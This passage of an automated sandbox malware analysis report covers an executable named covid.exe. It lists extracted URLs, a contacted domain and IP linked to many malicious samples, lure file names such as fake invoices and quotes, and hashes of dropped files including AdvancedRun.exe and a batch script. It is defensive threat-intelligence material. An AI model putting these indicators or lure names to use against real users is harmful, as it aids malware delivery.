                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://schema.org/ListItemcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      high
                      https://www.liverpool.com/all-about/georginio-wijnaldumcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://mab.data.tm-awx.com/rhs&quot;covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://felix.data.tm-awx.comcovid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://www.liverpool.com/all-about/andrew-robertsoncovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmp, covid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://sectigo.com/CPS0C41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://sectigo.com/CPS0D41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s180/0_GettyImages-1304940818.covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://www.liverpool.com/covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://www.liverpool.com/all-about/transferscovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpgcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://reach-id.orbit.tm-awx.com/analytics.js.gzcovid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://github.com/ded/script.jscovid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                        high
                        https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-17164868covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178covid.exe, 00000000.00000003.238761413.000000000382A000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://quantcast.mgr.consensu.orgcovid.exe, 00000000.00000003.239012614.0000000003ADD000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
172.67.220.147 | mmwrlridbhmibnr.ml | United States | 13335 | CLOUDFLARENETUS | false

Private

IP
192.168.2.1
General Information

Joe Sandbox Version:31.0.0 Emerald
Analysis ID:393947
Start date:20.04.2021
Start time:22:58:20
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 8m 59s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:covid.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:37
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal68.evad.winEXE@15/17@1/2
EGA Information:
• Successful, ratio: 75%
HDC Information:
• Successful, ratio: 100% (good quality ratio 95.8%)
• Quality average: 83%
• Quality standard deviation: 25.9%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 104.43.193.48, 204.79.197.200, 13.107.21.200, 20.50.102.62, 104.43.139.144, 23.54.113.53, 205.185.216.10, 205.185.216.42, 168.61.161.212, 23.57.80.111, 20.82.210.154, 92.122.213.247, 92.122.213.194, 52.254.96.93, 20.54.26.129, 52.251.11.100
• Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, bn2eap.displaycatalog.md.mp.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
22:59:57 | API Interceptor | 1x Sleep call for process: covid.exe modified
23:00:13 | API Interceptor | 68x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match: 172.67.220.147
Associated Sample Name / URL | Detection | Context
8TkFgL94vo.exe | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-4230C74ABAEB3870FA9EAF5AC5F71FD3.html
List.doc | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BDE7E4D0EF11A9396211C4DC45CCA257.html
QUOTE.doc | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-9E65D4E4E8AEF8BD307A35D3BCE3AEEE.html
7789-2020.doc | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-3B326A21F43E9F3D00AC05CA57C8BA56.html
payment receipt.doc | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BAD1D062871DD0CB1CFE768455005D62.html
QUOTE.doc | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-97E0AB11BF622A9A31CDEFFB82113E1B.html
cLQd2QVOWu.exe | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-DBBB4E10CBD7095142CF4698058E72A4.html
item list.doc | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-BDE7E4D0EF11A9396211C4DC45CCA257.html
Orders.exe | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-7AFD341D75B1C01FA414B8FBB3F4F2BC.html
w1YYpRG02e.exe | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5B3D301DB51C9B00F70AF37938BE599F.html
ADJUNTOEXTRACTO590878174787097120989222355748.exe | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-9A964AADD659F0067F881ACA423BCEDD.html
Factura Serfinanza022880209777477966487010096.exe | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-1E6FC8A774533AA394D4580F6DB6838B.html
SERFINANZAEXTRACTO283816558547438357773985414.exe | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-9B31D021FF64B2D5D03885F5B17A0908.html
EXTRACTOSERFINANZA596054271198721911813685868.exe | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-09E94B6C5260416402DA47E86244BE30.html
Property Details.pdf.exe | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-F02CDE0F9BC55206FC1C6FD48DB295AB.html
Request for Price.exe | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-CA312B7AD325B7F976AFB06E92A5151A.html
Invoice & BACS Documen.exe | malicious | mmwrlridbhmibnr.ml/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E09CECC00887731FA9705E28293E8864.html

Domains

Match: mmwrlridbhmibnr.ml
Associated Sample Name / URL | Detection | Context
SecuriteInfo.com.Trojan.Siggen13.10233.30629.exe | malicious | 104.21.86.143
OFneOuyQDx.exe | malicious | 104.21.86.143
2U1aZi86Sw.exe | malicious | 104.21.86.143
8TkFgL94vo.exe | malicious | 172.67.220.147
List.doc | malicious | 172.67.220.147
QUOTE.doc | malicious | 172.67.220.147
7789-2020.doc | malicious | 172.67.220.147
NEW ORDER.exe | malicious | 104.21.86.143
URGENT_QUOTATION_PR # 270473. 20-04-2021.exe | malicious | 104.21.86.143
QUOTE.doc | malicious | 104.21.86.143
payment receipt.doc | malicious | 172.67.220.147
QUOTE.doc | malicious | 172.67.220.147
VZL5ROpeId.exe | malicious | 104.21.86.143
cLQd2QVOWu.exe | malicious | 172.67.220.147
item list.doc | malicious | 172.67.220.147
Orders.exe | malicious | 172.67.220.147
FneJElVdDf.exe | malicious | 104.21.86.143
w1YYpRG02e.exe | malicious | 172.67.220.147
eh1CjskZCs.exe | malicious | 104.21.86.143
QSN0y9JNF1.exe | malicious | 104.21.86.143

ASN

Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Context
AttachementHtm.html | malicious | 104.16.18.94
6xrXVxpiSm.exe | malicious | 172.67.133.191
zj4NVQ6TKa.exe | malicious | 172.67.133.191
VZshmdIfmC.exe | malicious | 172.67.188.154
7wiTGdPpvv.exe | malicious | 172.67.188.154
7Wv8cQT117.exe | malicious | 172.67.133.191
5PthEm83NG.exe | malicious | 172.67.161.4
SecuriteInfo.com.Trojan.Siggen13.10233.30629.exe | malicious | 104.21.86.143
VoicePlayback (0155) for umclune myumanitoba .html | malicious | 104.16.18.94
apr.20.confirmaci#U0e02n SWIFT.exe | malicious | 162.159.134.233
Notification_test.htm | malicious | 104.16.19.94
OFneOuyQDx.exe | malicious | 104.21.86.143
SecuriteInfo.com.Variant.Bulz.440290.18036.exe | malicious | 172.67.133.191
SecuriteInfo.com.Trojan.GenericKD.36741716.4036.exe | malicious | 172.67.133.191
SecuriteInfo.com.Trojan.GenericKD.36740349.3453.exe | malicious | 104.21.14.15
4QwdcKOvum.exe | malicious | 104.21.48.10
2U1aZi86Sw.exe | malicious | 104.21.86.143
8TkFgL94vo.exe | malicious | 172.67.220.147
List.doc | malicious | 172.67.220.147
Account Details.exe | malicious | 104.21.19.200

JA3 Fingerprints

No context

Dropped Files

Match: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe
Associated Sample Name / URL | Detection
4EQNFqt5Nm.exe | malicious
URGENT_QUOTATION_PR # 270473. 20-04-2021.exe | malicious
NEW SUPPLIER FORM.exe | malicious
payment slip in foldrs.exe | malicious
Discharge - 10,500MT of ZN CONCS - Bukpyung.exe | malicious
2021190411466.exe | malicious
GxRBjQa5k0.exe | malicious
f1MdIMyl48.exe | malicious
exALRGzKKl.exe | malicious
BGUSVBJPtY.exe | malicious
Invoice & BACS Document.exe | malicious
XwpoNqWEJ2.exe | malicious
Request for Price.exe | malicious
EARTH SUMMT#U2013MAR21-V01VC.exe | malicious
EARTH SUMMTMAR21-V01VC.exe | malicious
NEWURGENTORDER.exe | malicious
Invoice & BACS Documen.exe | malicious
MV. WINTER SUMMER.exe | malicious
MV. MCL - 21.exe | malicious
Require your Sales Ledger from 01-April-2020.exe | malicious

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Process:C:\Users\user\Desktop\covid.exe
File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
Category:dropped
Size (bytes):58596
Entropy (8bit):7.995478615012125
Encrypted:true
SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
MD5:61A03D15CF62612F50B74867090DBE79
SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
Malicious:false
Reputation:high, very likely benign file
                                                                Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                Process:C:\Users\user\Desktop\covid.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):326
                                                                Entropy (8bit):3.089415833598504
                                                                Encrypted:false
                                                                SSDEEP:6:kKLlkwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:WwTJrkPlE99SNxAhUe0ht
                                                                MD5:3DCFE99F8D6BBF8BAE4F47092C0C15A0
                                                                SHA1:1C1CBE4F2F25DA8ADC960617F127CA4221786A24
                                                                SHA-256:A8413472CF220270F3D50ECD3753AFA5096896C6457668C055E120944DE188B4
                                                                SHA-512:FF2A4B7DA2F7D98EB1FF5C5C5C1D7264C072DC6C352A62A425CCC116626B0886B5D817A87A92A0053D9F400FA2A4FC37188A933FAEB3092ABC7B2B2C39526B39
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview: p...... ........bA]ts6..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\covid.exe.log
                                                                Process:C:\Users\user\Desktop\covid.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:modified
                                                                Size (bytes):1220
                                                                Entropy (8bit):5.354495486938689
                                                                Encrypted:false
                                                                SSDEEP:24:ML9E4Ks2f84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7GE4K+sXE4G1qE4j:MxHKXfviYHKhQnoPtHoxHhAHKzvGHK1d
                                                                MD5:3B495BE0A7E2A57ACC717A4A3DBBD1E8
                                                                SHA1:D91F0A7B70C6C55AADEBD64CBBA5831481D3D5ED
                                                                SHA-256:D499F90E7622879DCA8ADEC7068D9D8926F33FD6FE9CDA465A7189CA4F4E9A83
                                                                SHA-512:A3B7D7326AB1D827E03799CC3E1D79155D757D14C0ABA1E98B612C011629D589B7A85AF8292587F38A81E123AB2BA359D3D20CB0A70B77022B4FE0C2BE96C9AB
                                                                Malicious:true
                                                                Reputation:low
                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutra
                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):14734
                                                                Entropy (8bit):4.993014478972177
                                                                Encrypted:false
                                                                SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                MD5:8D5E194411E038C060288366D6766D3D
                                                                SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                Malicious:false
                                                                Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):22184
                                                                Entropy (8bit):5.603143783785762
                                                                Encrypted:false
                                                                SSDEEP:384:jtCDK0CcfWXs0JYYSBKnmultIo3D7Y9g9SJUeRa1BMrm7iSRV7yUoI64I+iGq:Dfp4Kmultp339Xehab9+
                                                                MD5:1EEC9310290AB90DC59FA655592CB564
                                                                SHA1:4EE4B16DEFC3D73F4B1712A8A64BEF9D83076A93
                                                                SHA-256:7529B20EB35160F759D52075E8D304EDB39AA55AF9CBB2CF8EECDDA5D93529CC
                                                                SHA-512:696AB9ABAD204E75F06C1EA3AC79A7BA0627DABF4070F2BB38C5DEDD35786142F8B83A5DB6654957AE632AE44CAF7552ECA090316EC5D3C8565BED153522BE41
                                                                Malicious:false
                                                                Preview: @...e...........c.........../. .........A............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe
                                                                Process:C:\Users\user\Desktop\covid.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):91000
                                                                Entropy (8bit):6.241345766746317
                                                                Encrypted:false
                                                                SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: 4EQNFqt5Nm.exe, Detection: malicious, Browse
                                                                • Filename: URGENT_QUOTATION_PR # 270473. 20-04-2021.exe, Detection: malicious, Browse
                                                                • Filename: NEW SUPPLIER FORM.exe, Detection: malicious, Browse
                                                                • Filename: payment slip in foldrs.exe, Detection: malicious, Browse
                                                                • Filename: Discharge - 10,500MT of ZN CONCS - Bukpyung.exe, Detection: malicious, Browse
                                                                • Filename: 2021190411466.exe, Detection: malicious, Browse
                                                                • Filename: GxRBjQa5k0.exe, Detection: malicious, Browse
                                                                • Filename: f1MdIMyl48.exe, Detection: malicious, Browse
                                                                • Filename: exALRGzKKl.exe, Detection: malicious, Browse
                                                                • Filename: BGUSVBJPtY.exe, Detection: malicious, Browse
                                                                • Filename: Invoice & BACS Document.exe, Detection: malicious, Browse
                                                                • Filename: XwpoNqWEJ2.exe, Detection: malicious, Browse
                                                                • Filename: Request for Price.exe, Detection: malicious, Browse
                                                                • Filename: EARTH SUMMT#U2013MAR21-V01VC.exe, Detection: malicious, Browse
                                                                • Filename: EARTH SUMMTMAR21-V01VC.exe, Detection: malicious, Browse
                                                                • Filename: NEWURGENTORDER.exe, Detection: malicious, Browse
                                                                • Filename: Invoice & BACS Documen.exe, Detection: malicious, Browse
                                                                • Filename: MV. WINTER SUMMER.exe, Detection: malicious, Browse
                                                                • Filename: MV. MCL - 21.exe, Detection: malicious, Browse
                                                                • Filename: Require your Sales Ledger from 01-April-2020.exe, Detection: malicious, Browse
                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat
                                                                Process:C:\Users\user\Desktop\covid.exe
                                                                File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):8399
                                                                Entropy (8bit):4.665734428420432
                                                                Encrypted:false
                                                                SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
